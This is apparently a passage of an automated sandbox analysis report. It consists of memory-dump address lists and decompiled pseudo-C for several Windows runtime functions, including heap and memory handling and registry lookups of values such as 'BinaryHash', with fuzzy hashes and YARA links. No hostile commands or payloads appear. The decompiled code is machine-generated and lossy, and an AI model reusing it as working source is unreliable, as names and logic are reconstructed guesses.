                                                                                                                                0x04ee2de1
                                                                                                                                0x04ee2e70
                                                                                                                                0x04ee2e72
                                                                                                                                0x04ee2e72
                                                                                                                                0x04ee2de7
                                                                                                                                0x04ee2deb
                                                                                                                                0x04ee2e7c
                                                                                                                                0x04ee2e83
                                                                                                                                0x04ee2e85
                                                                                                                                0x04ee2e8b
                                                                                                                                0x04ee2e8d
                                                                                                                                0x04ee2e92
                                                                                                                                0x04ee2e92
                                                                                                                                0x04ee2e85
                                                                                                                                0x04ee2df1
                                                                                                                                0x04ee2df7
                                                                                                                                0x04ee2df9
                                                                                                                                0x04ee2df9
                                                                                                                                0x04ee2dfc
                                                                                                                                0x04ee2dff
                                                                                                                                0x04ee2e02
                                                                                                                                0x00000000
                                                                                                                                0x04ee2e05
                                                                                                                                0x04ee2e0c
                                                                                                                                0x04f3f9d9
                                                                                                                                0x04ee2e12
                                                                                                                                0x04ee2e12
                                                                                                                                0x04ee2e12
                                                                                                                                0x04ee2e1a
                                                                                                                                0x04f3f9e3
                                                                                                                                0x04f3f9e9
                                                                                                                                0x04f3f9f0
                                                                                                                                0x04f3f9f6
                                                                                                                                0x04f3f9f8
                                                                                                                                0x04f3f9f8
                                                                                                                                0x04f3f9f0
                                                                                                                                0x04ee2e23
                                                                                                                                0x04f3fa02
                                                                                                                                0x04f3fa03
                                                                                                                                0x04f3fa05
                                                                                                                                0x04f3fa06
                                                                                                                                0x00000000
                                                                                                                                0x04ee2e29
                                                                                                                                0x04ee2e29
                                                                                                                                0x04ee2e2e
                                                                                                                                0x04ee2e34
                                                                                                                                0x04ee2e3e
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04ee2e44
                                                                                                                                0x04ee2e47
                                                                                                                                0x04ee2e4d
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04ee2e4f
                                                                                                                                0x04ee2e54
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04ee2e5a
                                                                                                                                0x04ee2e5f
                                                                                                                                0x04ee2e9a
                                                                                                                                0x04ee2ea4
                                                                                                                                0x04ee2ea5
                                                                                                                                0x04ee2ea8
                                                                                                                                0x04ee2eaf
                                                                                                                                0x04ee2eb2
                                                                                                                                0x04ee2eb5
                                                                                                                                0x04f3fae9
                                                                                                                                0x04f3faeb
                                                                                                                                0x04f3faed
                                                                                                                                0x04f3faef
                                                                                                                                0x04f3faf7
                                                                                                                                0x04f3faf8
                                                                                                                                0x04f3fafd
                                                                                                                                0x04f3faff
                                                                                                                                0x04f3fb04
                                                                                                                                0x04f3fb04
                                                                                                                                0x04f3faff
                                                                                                                                0x04ee2ec0
                                                                                                                                0x04ee2ec4
                                                                                                                                0x04ee2ec6
                                                                                                                                0x04ee2ec8
                                                                                                                                0x04f3fb14
                                                                                                                                0x04f3fb18
                                                                                                                                0x04f3fb1e
                                                                                                                                0x04f3fb21
                                                                                                                                0x04f3fb21
                                                                                                                                0x04ee2ece
                                                                                                                                0x04ee2ece
                                                                                                                                0x04ee2ece
                                                                                                                                0x04ee2ed7
                                                                                                                                0x04ee2e61
                                                                                                                                0x04ee2e63
                                                                                                                                0x04f3fa6b
                                                                                                                                0x04f3fa71
                                                                                                                                0x04f3fa76
                                                                                                                                0x04f3fa78
                                                                                                                                0x04f3fa8a
                                                                                                                                0x04f3fa7a
                                                                                                                                0x04f3fa83
                                                                                                                                0x04f3fa83
                                                                                                                                0x04f3fa8f
                                                                                                                                0x04f3fa91
                                                                                                                                0x04f3fa97
                                                                                                                                0x04f3fa9d
                                                                                                                                0x04f3faa4
                                                                                                                                0x04f3faaa
                                                                                                                                0x04f3faaf
                                                                                                                                0x04f3fab1
                                                                                                                                0x04f3fac3
                                                                                                                                0x04f3fab3
                                                                                                                                0x04f3fabc
                                                                                                                                0x04f3fabc
                                                                                                                                0x04f3fac8
                                                                                                                                0x04f3facb
                                                                                                                                0x04f3fadf
                                                                                                                                0x04f3fadf
                                                                                                                                0x04f3facb
                                                                                                                                0x04f3faa4
                                                                                                                                0x04f3fa91
                                                                                                                                0x04ee2e6f
                                                                                                                                0x04ee2e6f
                                                                                                                                0x04ee2e5f
                                                                                                                                0x04f3fa13
                                                                                                                                0x04f3fa15
                                                                                                                                0x04f3fa17
                                                                                                                                0x04f3fa1f
                                                                                                                                0x04f3fa21
                                                                                                                                0x04f3fa22
                                                                                                                                0x04f3fa25
                                                                                                                                0x04f3fa28
                                                                                                                                0x04f3fa2f
                                                                                                                                0x04f3fa2f
                                                                                                                                0x04f3fa2a
                                                                                                                                0x04f3fa2a
                                                                                                                                0x04f3fa2a
                                                                                                                                0x04f3fa31
                                                                                                                                0x04f3fa34
                                                                                                                                0x04f3fa36
                                                                                                                                0x04f3fa3c
                                                                                                                                0x04f3fa3e
                                                                                                                                0x04f3fa41
                                                                                                                                0x04f3fa43
                                                                                                                                0x04f3fa45
                                                                                                                                0x04f3fa45
                                                                                                                                0x04f3fa41
                                                                                                                                0x04f3fa3c
                                                                                                                                0x04f3fa4a
                                                                                                                                0x04f3fa4f
                                                                                                                                0x04f3fa51
                                                                                                                                0x04f3fa53
                                                                                                                                0x04f3fa56
                                                                                                                                0x04f3fa5b
                                                                                                                                0x04f3fa5e
                                                                                                                                0x00000000
                                                                                                                                0x04f3fa5e
                                                                                                                                0x04ee2e23

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: RTL: Re-Waiting
                                                                                                                                • API String ID: 0-316354757
                                                                                                                                • Opcode ID: 93746af120d9e862b2f50a553a5103ad86ba1370fdd98cf263dd0376936368b4
                                                                                                                                • Instruction ID: ceb80e74736a19c2b87dae95ad08a6cc86c1f546af877f5ab003397fef794a74
                                                                                                                                • Opcode Fuzzy Hash: 93746af120d9e862b2f50a553a5103ad86ba1370fdd98cf263dd0376936368b4
                                                                                                                                • Instruction Fuzzy Hash: 29612731F01614AFEF32DF69C840B7E77E9EB44718F1406AADA11972D0D774B90297A2
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04FB0EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 80%
                                                                                                                                			E04FB0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E04FAFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E04FB1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E04F29730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E04FAA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E04FAA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x4fd8b04 >> 0x14) + (_v44 -  *0x4fd8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E04F07D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E04FA138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E04F07D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E04F9FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x4fd8724 & 0x00000008) != 0) {
						E04FA52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E04FB15B5(0x4fd8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                                                                                                0x04fb0eb7
                                                                                                                                0x04fb0eb9
                                                                                                                                0x04fb0ec0
                                                                                                                                0x04fb0ec2
                                                                                                                                0x04fb0ecd
                                                                                                                                0x04fb105b
                                                                                                                                0x04fb105b
                                                                                                                                0x04fb1061
                                                                                                                                0x04fb1066
                                                                                                                                0x04fb1066
                                                                                                                                0x04fb106b
                                                                                                                                0x04fb1073
                                                                                                                                0x04fb1073
                                                                                                                                0x04fb0ed3
                                                                                                                                0x04fb0ed6
                                                                                                                                0x04fb0edc
                                                                                                                                0x04fb0ee0
                                                                                                                                0x04fb0ee7
                                                                                                                                0x04fb0ef0
                                                                                                                                0x04fb0ef5
                                                                                                                                0x04fb0efa
                                                                                                                                0x04fb0efc
                                                                                                                                0x04fb0efd
                                                                                                                                0x04fb0f03
                                                                                                                                0x04fb0f04
                                                                                                                                0x04fb0f06
                                                                                                                                0x04fb0f07
                                                                                                                                0x04fb0f09
                                                                                                                                0x04fb0f0e
                                                                                                                                0x04fb0f14
                                                                                                                                0x04fb0f23
                                                                                                                                0x04fb0f2d
                                                                                                                                0x04fb0f34
                                                                                                                                0x04fb0f34
                                                                                                                                0x04fb0f14
                                                                                                                                0x04fb0f52
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04fb0f58
                                                                                                                                0x04fb0f73
                                                                                                                                0x04fb0f74
                                                                                                                                0x04fb0f79
                                                                                                                                0x04fb0f7d
                                                                                                                                0x04fb0f80
                                                                                                                                0x04fb0f86
                                                                                                                                0x04fb0fab
                                                                                                                                0x04fb0fb5
                                                                                                                                0x04fb0fc6
                                                                                                                                0x04fb0fd1
                                                                                                                                0x04fb0fe3
                                                                                                                                0x04fb0fd3
                                                                                                                                0x04fb0fdc
                                                                                                                                0x04fb0fdc
                                                                                                                                0x04fb0feb
                                                                                                                                0x04fb1009
                                                                                                                                0x04fb1009
                                                                                                                                0x04fb1015
                                                                                                                                0x04fb1027
                                                                                                                                0x04fb1017
                                                                                                                                0x04fb1020
                                                                                                                                0x04fb1020
                                                                                                                                0x04fb102f
                                                                                                                                0x04fb103c
                                                                                                                                0x04fb103c
                                                                                                                                0x04fb1048
                                                                                                                                0x04fb1050
                                                                                                                                0x04fb1050
                                                                                                                                0x04fb1055
                                                                                                                                0x00000000
                                                                                                                                0x04fb1055
                                                                                                                                0x04fb0f88
                                                                                                                                0x04fb0f9e
                                                                                                                                0x04fb0fa2
                                                                                                                                0x04fb0fa9
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04fb0fa9
                                                                                                                                0x00000000

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: `
                                                                                                                                • API String ID: 0-2679148245
                                                                                                                                • Opcode ID: 961ab6972ef5c56ed095301224edfb04bd8b9ec097108cf4baccf5c89b52b919
                                                                                                                                • Instruction ID: d39d4dbbed47f1feb3749877093e86b728f94698fbba6d2370350320d75df472
                                                                                                                                • Opcode Fuzzy Hash: 961ab6972ef5c56ed095301224edfb04bd8b9ec097108cf4baccf5c89b52b919
                                                                                                                                • Instruction Fuzzy Hash: DB51BC713047429FE324DF2AD990B5BB7E5EBC5384F04492CF99687290DA70F806CBA2
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F1F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 75%
                                                                                                                                			E04F1F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E04F04120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E04F29830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E04F29990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E04F295D0();
							goto L11;
						} else {
							_t109 = L04F04620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E04F2F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E04F295D0();
										L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                                                                                                0x04f1f0d3
                                                                                                                                0x04f1f0d9
                                                                                                                                0x04f1f0e0
                                                                                                                                0x04f1f0e7
                                                                                                                                0x04f1f0f2
                                                                                                                                0x04f1f0f4
                                                                                                                                0x04f1f0f8
                                                                                                                                0x04f1f100
                                                                                                                                0x04f1f108
                                                                                                                                0x04f1f10d
                                                                                                                                0x04f1f115
                                                                                                                                0x04f1f116
                                                                                                                                0x04f1f11f
                                                                                                                                0x04f1f123
                                                                                                                                0x04f1f124
                                                                                                                                0x04f1f12c
                                                                                                                                0x04f1f130
                                                                                                                                0x04f1f134
                                                                                                                                0x04f1f13d
                                                                                                                                0x04f1f144
                                                                                                                                0x04f1f14b
                                                                                                                                0x04f1f152
                                                                                                                                0x04f5bab0
                                                                                                                                0x04f5bab0
                                                                                                                                0x04f1f158
                                                                                                                                0x04f1f158
                                                                                                                                0x04f1f15a
                                                                                                                                0x04f1f160
                                                                                                                                0x04f1f165
                                                                                                                                0x04f1f166
                                                                                                                                0x04f1f16f
                                                                                                                                0x04f1f173
                                                                                                                                0x04f5baa7
                                                                                                                                0x04f5baa7
                                                                                                                                0x04f5baab
                                                                                                                                0x00000000
                                                                                                                                0x04f1f179
                                                                                                                                0x04f1f18d
                                                                                                                                0x04f1f191
                                                                                                                                0x04f5baa2
                                                                                                                                0x00000000
                                                                                                                                0x04f1f197
                                                                                                                                0x04f1f19b
                                                                                                                                0x04f1f1a2
                                                                                                                                0x04f1f1a9
                                                                                                                                0x04f1f1af
                                                                                                                                0x04f1f1b2
                                                                                                                                0x04f1f1b6
                                                                                                                                0x04f1f1b9
                                                                                                                                0x04f1f1c4
                                                                                                                                0x04f1f1d8
                                                                                                                                0x04f1f1df
                                                                                                                                0x04f1f1e3
                                                                                                                                0x04f1f1eb
                                                                                                                                0x04f1f1ee
                                                                                                                                0x04f1f1f4
                                                                                                                                0x04f1f20f
                                                                                                                                0x04f5bab7
                                                                                                                                0x04f5babb
                                                                                                                                0x04f5bacc
                                                                                                                                0x04f5bad1
                                                                                                                                0x04f1f215
                                                                                                                                0x04f1f218
                                                                                                                                0x04f1f226
                                                                                                                                0x04f1f22b
                                                                                                                                0x00000000
                                                                                                                                0x04f1f22b
                                                                                                                                0x04f1f1f6
                                                                                                                                0x04f1f1f6
                                                                                                                                0x04f1f1f9
                                                                                                                                0x04f1f1fb
                                                                                                                                0x04f1f1fb
                                                                                                                                0x04f1f1f4
                                                                                                                                0x04f1f191
                                                                                                                                0x04f1f173
                                                                                                                                0x04f1f152
                                                                                                                                0x04f1f203

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @
                                                                                                                                • API String ID: 0-2766056989
                                                                                                                                • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                                                • Instruction ID: 1618a837ce1ec5498217c2491b1febeb5316382a0c576294afa22648962c6b29
                                                                                                                                • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                                                • Instruction Fuzzy Hash: 4A518D716047109FD321DF29C840A6BBBF8FF88714F00892DFA95976A0E7B4E915CBA1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F63540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 75%
                                                                                                                                			E04F63540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x4fdd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E04F20BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E04F63706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E04F2FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E04F63540;
						E04F2FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E04F3DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E04F70C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E04F297C0();
					}
					return E04F2B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E04F63971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E04F63884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E04F2FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E04F29650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E04F63787(_a4,  &_v352, _t80);
						}
					}
					L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E04F295D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                                                                                                0x04f63552
                                                                                                                                0x04f6355a
                                                                                                                                0x04f6355d
                                                                                                                                0x04f63566
                                                                                                                                0x04f63567
                                                                                                                                0x04f6357e
                                                                                                                                0x04f6358f
                                                                                                                                0x04f635a1
                                                                                                                                0x04f635a5
                                                                                                                                0x04f6366b
                                                                                                                                0x04f6366b
                                                                                                                                0x04f6366d
                                                                                                                                0x04f63672
                                                                                                                                0x04f63679
                                                                                                                                0x04f63685
                                                                                                                                0x04f6368d
                                                                                                                                0x04f6369d
                                                                                                                                0x04f636a7
                                                                                                                                0x04f636b8
                                                                                                                                0x04f636c6
                                                                                                                                0x04f636c7
                                                                                                                                0x04f636dc
                                                                                                                                0x04f636e1
                                                                                                                                0x04f636e7
                                                                                                                                0x04f636e9
                                                                                                                                0x04f636e9
                                                                                                                                0x04f63703
                                                                                                                                0x04f63703
                                                                                                                                0x04f635b5
                                                                                                                                0x04f635c0
                                                                                                                                0x04f635c4
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f635ca
                                                                                                                                0x04f635d7
                                                                                                                                0x04f635e2
                                                                                                                                0x04f635e6
                                                                                                                                0x04f635e8
                                                                                                                                0x04f635f5
                                                                                                                                0x04f635fa
                                                                                                                                0x04f63603
                                                                                                                                0x04f63604
                                                                                                                                0x04f63609
                                                                                                                                0x04f6360a
                                                                                                                                0x04f63612
                                                                                                                                0x04f63613
                                                                                                                                0x04f6361e
                                                                                                                                0x04f63622
                                                                                                                                0x04f63628
                                                                                                                                0x04f6362f
                                                                                                                                0x04f6362f
                                                                                                                                0x04f63636
                                                                                                                                0x04f63638
                                                                                                                                0x04f6363b
                                                                                                                                0x04f63642
                                                                                                                                0x04f63642
                                                                                                                                0x04f63636
                                                                                                                                0x04f63657
                                                                                                                                0x04f63657
                                                                                                                                0x04f6365c
                                                                                                                                0x04f63662
                                                                                                                                0x04f63669
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID: BinaryHash
                                                                                                                                • API String ID: 2994545307-2202222882
                                                                                                                                • Opcode ID: 5d8d43a5e4eee9d9ac4e50777657ff3ecd0714fa19d7ce9bc742638a86a8d99c
                                                                                                                                • Instruction ID: 5b657aaa5212265c1f54ce33c0f3ea749322e72c25c7502e3e886be673582ffa
                                                                                                                                • Opcode Fuzzy Hash: 5d8d43a5e4eee9d9ac4e50777657ff3ecd0714fa19d7ce9bc742638a86a8d99c
                                                                                                                                • Instruction Fuzzy Hash: E94146F1D0152CAFEB21DA50CD81FDEB77CAB44718F0045A5EA09A7240DB71BE898FA5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F63884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 72%
                                                                                                                                			E04F63884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E04F29650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L04F04620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E04F29650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                                                                                                0x04f63893
                                                                                                                                0x04f63896
                                                                                                                                0x04f63899
                                                                                                                                0x04f6389f
                                                                                                                                0x04f638a0
                                                                                                                                0x04f638a4
                                                                                                                                0x04f638a9
                                                                                                                                0x04f638ac
                                                                                                                                0x04f638ad
                                                                                                                                0x04f638ae
                                                                                                                                0x04f638af
                                                                                                                                0x04f638b1
                                                                                                                                0x04f638b4
                                                                                                                                0x04f638bb
                                                                                                                                0x04f638bc
                                                                                                                                0x04f638bd
                                                                                                                                0x04f638c4
                                                                                                                                0x04f638c8
                                                                                                                                0x04f638ca
                                                                                                                                0x04f638ca
                                                                                                                                0x04f638d5
                                                                                                                                0x04f6393e
                                                                                                                                0x04f63940
                                                                                                                                0x04f63942
                                                                                                                                0x04f63952
                                                                                                                                0x04f63954
                                                                                                                                0x04f63961
                                                                                                                                0x04f63961
                                                                                                                                0x04f63967
                                                                                                                                0x04f6396e
                                                                                                                                0x04f6396e
                                                                                                                                0x04f63947
                                                                                                                                0x04f6394c
                                                                                                                                0x00000000
                                                                                                                                0x04f6394c
                                                                                                                                0x04f638ea
                                                                                                                                0x04f638ee
                                                                                                                                0x04f638f8
                                                                                                                                0x04f638f9
                                                                                                                                0x04f638ff
                                                                                                                                0x04f63900
                                                                                                                                0x04f63902
                                                                                                                                0x04f63903
                                                                                                                                0x04f6390b
                                                                                                                                0x04f6390f
                                                                                                                                0x04f63950
                                                                                                                                0x00000000
                                                                                                                                0x04f63950
                                                                                                                                0x04f63915
                                                                                                                                0x04f6391d
